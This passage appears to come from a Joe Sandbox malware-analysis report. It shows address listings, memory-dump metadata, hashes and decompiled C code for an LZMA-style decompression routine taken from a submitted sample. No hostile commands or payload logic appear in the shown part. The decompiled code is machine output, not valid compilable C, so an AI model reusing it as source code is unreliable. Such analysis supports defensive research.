                      0x00407074
                      0x00407077
                      0x00407084
                      0x00407087
                      0x00407087
                      0x00000000
                      0x00000000
                      0x004070ab
                      0x004070af
                      0x00000000
                      0x00000000
                      0x004070b5
                      0x004070b9
                      0x00000000
                      0x00000000
                      0x004070bf
                      0x004070c1
                      0x004070c5
                      0x004070c5
                      0x004070c8
                      0x004070cc
                      0x00000000
                      0x00000000
                      0x0040711c
                      0x00407120
                      0x00407127
                      0x0040712a
                      0x0040712d
                      0x00407137
                      0x00000000
                      0x00407137
                      0x00407122
                      0x00000000
                      0x00000000
                      0x00407143
                      0x00407147
                      0x0040714e
                      0x00407151
                      0x00407154
                      0x00407149
                      0x00407149
                      0x00407149
                      0x00407157
                      0x0040715a
                      0x0040715d
                      0x0040715d
                      0x00407160
                      0x00407163
                      0x00407166
                      0x00407166
                      0x00407169
                      0x00407170
                      0x00407175
                      0x00000000
                      0x00000000
                      0x00407203
                      0x00407203
                      0x00407207
                      0x004075a5
                      0x00000000
                      0x004075a5
                      0x0040720d
                      0x00407210
                      0x00407213
                      0x00407217
                      0x0040721a
                      0x00407220
                      0x00407222
                      0x00407222
                      0x00407222
                      0x00407225
                      0x00407228
                      0x00000000
                      0x00000000
                      0x00406df8
                      0x00406df8
                      0x00406dfc
                      0x00407569
                      0x00000000
                      0x00407569
                      0x00406e02
                      0x00406e05
                      0x00406e08
                      0x00406e0c
                      0x00406e0f
                      0x00406e15
                      0x00406e17
                      0x00406e17
                      0x00406e17
                      0x00406e1a
                      0x00406e1d
                      0x00406e1d
                      0x00406e20
                      0x00406e23
                      0x00000000
                      0x00000000
                      0x00406e29
                      0x00406e2f
                      0x00000000
                      0x00000000
                      0x00406e35
                      0x00406e35
                      0x00406e39
                      0x00406e3c
                      0x00406e3f
                      0x00406e42
                      0x00406e45
                      0x00406e46
                      0x00406e49
                      0x00406e4b
                      0x00406e51
                      0x00406e54
                      0x00406e57
                      0x00406e5a
                      0x00406e5d
                      0x00406e60
                      0x00406e63
                      0x00406e7f
                      0x00406e82
                      0x00406e85
                      0x00406e88
                      0x00406e8f
                      0x00406e93
                      0x00406e95
                      0x00406e99
                      0x00406e65
                      0x00406e65
                      0x00406e69
                      0x00406e71
                      0x00406e76
                      0x00406e78
                      0x00406e7a
                      0x00406e7a
                      0x00406e9c
                      0x00406ea3
                      0x00406ea6
                      0x00000000
                      0x00406eac
                      0x00000000
                      0x00406eac
                      0x00000000
                      0x00406eb1
                      0x00406eb1
                      0x00406eb5
                      0x00407575
                      0x00000000
                      0x00407575
                      0x00406ebb
                      0x00406ebe
                      0x00406ec1
                      0x00406ec5
                      0x00406ec8
                      0x00406ece
                      0x00406ed0
                      0x00406ed0
                      0x00406ed0
                      0x00406ed3
                      0x00406ed6
                      0x00406ed6
                      0x00406ed6
                      0x00406edc
                      0x00000000
                      0x00000000
                      0x00406ede
                      0x00406ee1
                      0x00406ee4
                      0x00406ee7
                      0x00406eea
                      0x00406eed
                      0x00406ef0
                      0x00406ef3
                      0x00406ef6
                      0x00406ef9
                      0x00406efc
                      0x00406f14
                      0x00406f17
                      0x00406f1a
                      0x00406f1d
                      0x00406f1d
                      0x00406f20
                      0x00406f24
                      0x00406f26
                      0x00406efe
                      0x00406efe
                      0x00406f06
                      0x00406f0b
                      0x00406f0d
                      0x00406f0f
                      0x00406f0f
                      0x00406f29
                      0x00406f30
                      0x00406f33
                      0x00000000
                      0x00406f35
                      0x00000000
                      0x00406f35
                      0x00406f33
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00000000
                      0x00000000
                      0x00406f75
                      0x00406f75
                      0x00406f79
                      0x00407581
                      0x00000000
                      0x00407581
                      0x00406f7f
                      0x00406f82
                      0x00406f85
                      0x00406f89
                      0x00406f8c
                      0x00406f92
                      0x00406f94
                      0x00406f94
                      0x00406f94
                      0x00406f97
                      0x00406f9a
                      0x00406f9a
                      0x00406fa0
                      0x00406f3e
                      0x00406f3e
                      0x00406f41
                      0x00000000
                      0x00406f41
                      0x00406fa2
                      0x00406fa2
                      0x00406fa5
                      0x00406fa8
                      0x00406fab
                      0x00406fae
                      0x00406fb1
                      0x00406fb4
                      0x00406fb7
                      0x00406fba
                      0x00406fbd
                      0x00406fc0
                      0x00406fd8
                      0x00406fdb
                      0x00406fde
                      0x00406fe1
                      0x00406fe1
                      0x00406fe4
                      0x00406fe8
                      0x00406fea
                      0x00406fc2
                      0x00406fc2
                      0x00406fca
                      0x00406fcf
                      0x00406fd1
                      0x00406fd3
                      0x00406fd3
                      0x00406fed
                      0x00406ff4
                      0x00406ff7
                      0x00000000
                      0x00406ff9
                      0x00000000
                      0x00406ff9
                      0x00000000
                      0x00407286
                      0x00407286
                      0x0040728a
                      0x004075b1
                      0x00000000
                      0x004075b1
                      0x00407290
                      0x00407293
                      0x00407296
                      0x0040729a
                      0x0040729d
                      0x004072a3
                      0x004072a5
                      0x004072a5
                      0x004072a5
                      0x004072a8
                      0x00000000
                      0x00000000
                      0x00407056
                      0x00407056
                      0x00407059
                      0x00000000
                      0x00000000
                      0x00407395
                      0x00407399
                      0x004073bb
                      0x004073be
                      0x004073c8
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x0040739b
                      0x0040739e
                      0x004073a2
                      0x004073a5
                      0x004073a5
                      0x004073a8
                      0x00000000
                      0x00000000
                      0x00407452
                      0x00407456
                      0x00407474
                      0x00407474
                      0x00407474
                      0x0040747b
                      0x00407482
                      0x00407489
                      0x00407489
                      0x00000000
                      0x00407489
                      0x00407458
                      0x0040745b
                      0x0040745e
                      0x00407461
                      0x00407468
                      0x004073ac
                      0x004073ac
                      0x004073af
                      0x00000000
                      0x00000000
                      0x00407543
                      0x00407546
                      0x00000000
                      0x00000000
                      0x0040717d
                      0x0040717f
                      0x00407186
                      0x00407187
                      0x00407189
                      0x0040718c
                      0x00000000
                      0x00000000
                      0x00407194
                      0x00407197
                      0x0040719a
                      0x0040719c
                      0x0040719e
                      0x0040719e
                      0x0040719f
                      0x004071a2
                      0x004071a9
                      0x004071ac
                      0x004071ba
                      0x00000000
                      0x00000000
                      0x00407490
                      0x00407490
                      0x00407493
                      0x0040749a
                      0x00000000
                      0x00000000
                      0x0040749f
                      0x0040749f
                      0x004074a3
                      0x004075db
                      0x00000000
                      0x004075db
                      0x004074a9
                      0x004074ac
                      0x004074af
                      0x004074b3
                      0x004074b6
                      0x004074bc
                      0x004074be
                      0x004074be
                      0x004074be
                      0x004074c1
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c7
                      0x004074c7
                      0x004074cb
                      0x0040752b
                      0x0040752e
                      0x00407533
                      0x00407534
                      0x00407536
                      0x00407538
                      0x0040753b
                      0x00407447
                      0x00407447
                      0x00000000
                      0x00407447
                      0x004074cd
                      0x004074d3
                      0x004074d6
                      0x004074d9
                      0x004074dc
                      0x004074df
                      0x004074e2
                      0x004074e5
                      0x004074e8
                      0x004074eb
                      0x004074ee
                      0x00407507
                      0x0040750a
                      0x0040750d
                      0x00407510
                      0x00407514
                      0x00407516
                      0x00407516
                      0x00407517
                      0x0040751a
                      0x004074f0
                      0x004074f0
                      0x004074f8
                      0x004074fd
                      0x004074ff
                      0x00407502
                      0x00407502
                      0x0040751d
                      0x00407524
                      0x00000000
                      0x00407526
                      0x00000000
                      0x00407526
                      0x00000000
                      0x004071c2
                      0x004071c5
                      0x004071fb
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732e
                      0x0040732e
                      0x00407331
                      0x00407333
                      0x004075bd
                      0x00000000
                      0x004075bd
                      0x00407339
                      0x0040733c
                      0x00000000
                      0x00000000
                      0x00407342
                      0x00407346
                      0x00407349
                      0x00407349
                      0x00407349
                      0x00000000
                      0x00407349
                      0x004071c7
                      0x004071c9
                      0x004071cb
                      0x004071cd
                      0x004071d0
                      0x004071d1
                      0x004071d3
                      0x004071d5
                      0x004071d8
                      0x004071db
                      0x004071f1
                      0x004071f6
                      0x0040722e
                      0x0040722e
                      0x00407232
                      0x0040725e
                      0x00407260
                      0x00407267
                      0x0040726a
                      0x0040726d
                      0x0040726d
                      0x00407272
                      0x00407272
                      0x00407274
                      0x00407277
                      0x0040727e
                      0x00407281
                      0x004072ae
                      0x004072ae
                      0x004072b1
                      0x004072b4
                      0x00407328
                      0x00407328
                      0x00407328
                      0x00000000
                      0x00407328
                      0x004072b6
                      0x004072bc
                      0x004072bf
                      0x004072c2
                      0x004072c5
                      0x004072c8
                      0x004072cb
                      0x004072ce
                      0x004072d1
                      0x004072d4
                      0x004072d7
                      0x004072f0
                      0x004072f2
                      0x004072f5
                      0x004072f6
                      0x004072f9
                      0x004072fb
                      0x004072fe
                      0x00407300
                      0x00407302
                      0x00407305
                      0x00407307
                      0x0040730a
                      0x0040730e
                      0x00407310
                      0x00407310
                      0x00407311
                      0x00407314
                      0x00407317
                      0x004072d9
                      0x004072d9
                      0x004072e1
                      0x004072e6
                      0x004072e8
                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00406f44
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x00000000
                      0x00000000
                      0x004070cf
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x00000000
                      0x00407599
                      0x004070d9
                      0x004070dc
                      0x004070df
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407105
                      0x00407108
                      0x0040710a
                      0x0040710a
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x0040710d
                      0x0040710d
                      0x00000000
                      0x0040710d
                      0x0040738e
                      0x004075c3
                      0x004075e5
                      0x004075eb
                      0x004075ed
                      0x004075f4
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x004075fa
                      0x004075fa
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                      • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                      • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                      • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406FFE() {
                      				signed int _t539;
                      				unsigned short _t540;
                      				signed int _t541;
                      				void _t542;
                      				signed int _t543;
                      				signed int _t544;
                      				signed int _t573;
                      				signed int _t576;
                      				signed int _t597;
                      				signed int* _t614;
                      				void* _t621;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t621 - 0x40) != 1) {
                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                      						_t539 =  *(_t621 - 4) + 0x664;
                      						 *(_t621 - 0x58) = _t539;
                      						goto L68;
                      					} else {
                      						 *(__ebp - 0x84) = 8;
                      						while(1) {
                      							L132:
                      							 *(_t621 - 0x54) = _t614;
                      							while(1) {
                      								L133:
                      								_t540 =  *_t614;
                      								_t597 = _t540 & 0x0000ffff;
                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                      								if( *(_t621 - 0xc) >= _t573) {
                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                      									 *(_t621 - 0x40) = 1;
                      									_t541 = _t540 - (_t540 >> 5);
                      									 *_t614 = _t541;
                      								} else {
                      									 *(_t621 - 0x10) = _t573;
                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                      								}
                      								if( *(_t621 - 0x10) >= 0x1000000) {
                      									goto L139;
                      								}
                      								L137:
                      								if( *(_t621 - 0x6c) == 0) {
                      									 *(_t621 - 0x88) = 5;
                      									L170:
                      									_t576 = 0x22;
                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                      									_t544 = 0;
                      									L172:
                      									return _t544;
                      								}
                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                      								L139:
                      								_t542 =  *(_t621 - 0x84);
                      								while(1) {
                      									 *(_t621 - 0x88) = _t542;
                      									while(1) {
                      										L1:
                      										_t543 =  *(_t621 - 0x88);
                      										if(_t543 > 0x1c) {
                      											break;
                      										}
                      										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                      											case 0:
                      												if( *(_t621 - 0x6c) == 0) {
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      												_t543 =  *( *(_t621 - 0x70));
                      												if(_t543 > 0xe1) {
                      													goto L171;
                      												}
                      												_t547 = _t543 & 0x000000ff;
                      												_push(0x2d);
                      												asm("cdq");
                      												_pop(_t578);
                      												_push(9);
                      												_pop(_t579);
                      												_t617 = _t547 / _t578;
                      												_t549 = _t547 % _t578 & 0x000000ff;
                      												asm("cdq");
                      												_t612 = _t549 % _t579 & 0x000000ff;
                      												 *(_t621 - 0x3c) = _t612;
                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                      													L10:
                      													if(_t620 == 0) {
                      														L12:
                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      														goto L15;
                      													} else {
                      														goto L11;
                      													}
                      													do {
                      														L11:
                      														_t620 = _t620 - 1;
                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                      													} while (_t620 != 0);
                      													goto L12;
                      												}
                      												if( *(_t621 - 4) != 0) {
                      													GlobalFree( *(_t621 - 4));
                      												}
                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                      												 *(_t621 - 4) = _t543;
                      												if(_t543 == 0) {
                      													goto L171;
                      												} else {
                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                      													goto L10;
                      												}
                      											case 1:
                      												L13:
                      												__eflags =  *(_t621 - 0x6c);
                      												if( *(_t621 - 0x6c) == 0) {
                      													 *(_t621 - 0x88) = 1;
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      												_t45 = _t621 - 0x48;
                      												 *_t45 =  *(_t621 - 0x48) + 1;
                      												__eflags =  *_t45;
                      												L15:
                      												if( *(_t621 - 0x48) < 4) {
                      													goto L13;
                      												}
                      												_t555 =  *(_t621 - 0x40);
                      												if(_t555 ==  *(_t621 - 0x74)) {
                      													L20:
                      													 *(_t621 - 0x48) = 5;
                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                      													goto L23;
                      												}
                      												 *(_t621 - 0x74) = _t555;
                      												if( *(_t621 - 8) != 0) {
                      													GlobalFree( *(_t621 - 8));
                      												}
                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                      												 *(_t621 - 8) = _t543;
                      												if(_t543 == 0) {
                      													goto L171;
                      												} else {
                      													goto L20;
                      												}
                      											case 2:
                      												L24:
                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                      												 *(_t621 - 0x84) = 6;
                      												 *(_t621 - 0x4c) = _t562;
                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                      												goto L132;
                      											case 3:
                      												L21:
                      												__eflags =  *(_t621 - 0x6c);
                      												if( *(_t621 - 0x6c) == 0) {
                      													 *(_t621 - 0x88) = 3;
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												_t67 = _t621 - 0x70;
                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                      												__eflags =  *_t67;
                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                      												L23:
                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                      												if( *(_t621 - 0x48) != 0) {
                      													goto L21;
                      												}
                      												goto L24;
                      											case 4:
                      												L133:
                      												_t540 =  *_t614;
                      												_t597 = _t540 & 0x0000ffff;
                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                      												if( *(_t621 - 0xc) >= _t573) {
                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                      													 *(_t621 - 0x40) = 1;
                      													_t541 = _t540 - (_t540 >> 5);
                      													 *_t614 = _t541;
                      												} else {
                      													 *(_t621 - 0x10) = _t573;
                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                      												}
                      												if( *(_t621 - 0x10) >= 0x1000000) {
                      													goto L139;
                      												}
                      											case 5:
                      												goto L137;
                      											case 6:
                      												__edx = 0;
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x34) = 1;
                      													 *(__ebp - 0x84) = 7;
                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      												__esi =  *(__ebp - 0x60);
                      												__cl = 8;
                      												__cl = 8 -  *(__ebp - 0x3c);
                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      												__ecx =  *(__ebp - 0x3c);
                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      												__ecx =  *(__ebp - 4);
                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      												__eflags =  *(__ebp - 0x38) - 4;
                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												if( *(__ebp - 0x38) >= 4) {
                      													__eflags =  *(__ebp - 0x38) - 0xa;
                      													if( *(__ebp - 0x38) >= 0xa) {
                      														_t98 = __ebp - 0x38;
                      														 *_t98 =  *(__ebp - 0x38) - 6;
                      														__eflags =  *_t98;
                      													} else {
                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      													}
                      												} else {
                      													 *(__ebp - 0x38) = 0;
                      												}
                      												__eflags =  *(__ebp - 0x34) - __edx;
                      												if( *(__ebp - 0x34) == __edx) {
                      													__ebx = 0;
                      													__ebx = 1;
                      													goto L61;
                      												} else {
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__ecx =  *(__ebp - 8);
                      													__ebx = 0;
                      													__ebx = 1;
                      													__al =  *((intOrPtr*)(__eax + __ecx));
                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      													goto L41;
                      												}
                      											case 7:
                      												goto L0;
                      											case 8:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xa;
                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      												} else {
                      													__eax =  *(__ebp - 0x38);
                      													__ecx =  *(__ebp - 4);
                      													__eax =  *(__ebp - 0x38) + 0xf;
                      													 *(__ebp - 0x84) = 9;
                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      												}
                      												while(1) {
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      											case 9:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													goto L89;
                      												}
                      												__eflags =  *(__ebp - 0x60);
                      												if( *(__ebp - 0x60) == 0) {
                      													goto L171;
                      												}
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      												__eflags = _t258;
                      												0 | _t258 = _t258 + _t258 + 9;
                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      												goto L75;
                      											case 0xa:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xb;
                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      													while(1) {
                      														L132:
                      														 *(_t621 - 0x54) = _t614;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x28);
                      												goto L88;
                      											case 0xb:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__ecx =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x20);
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												} else {
                      													__eax =  *(__ebp - 0x24);
                      												}
                      												__ecx =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												L88:
                      												__ecx =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x2c) = __eax;
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												L89:
                      												__eax =  *(__ebp - 4);
                      												 *(__ebp - 0x80) = 0x15;
                      												__eax =  *(__ebp - 4) + 0xa68;
                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      												goto L68;
                      											case 0xc:
                      												L99:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xc;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t334 = __ebp - 0x70;
                      												 *_t334 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t334;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												__eax =  *(__ebp - 0x2c);
                      												goto L101;
                      											case 0xd:
                      												L37:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xd;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t122 = __ebp - 0x70;
                      												 *_t122 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t122;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L39:
                      												__eax =  *(__ebp - 0x40);
                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      													goto L48;
                      												}
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													goto L54;
                      												}
                      												L41:
                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      												__ecx =  *(__ebp - 0x58);
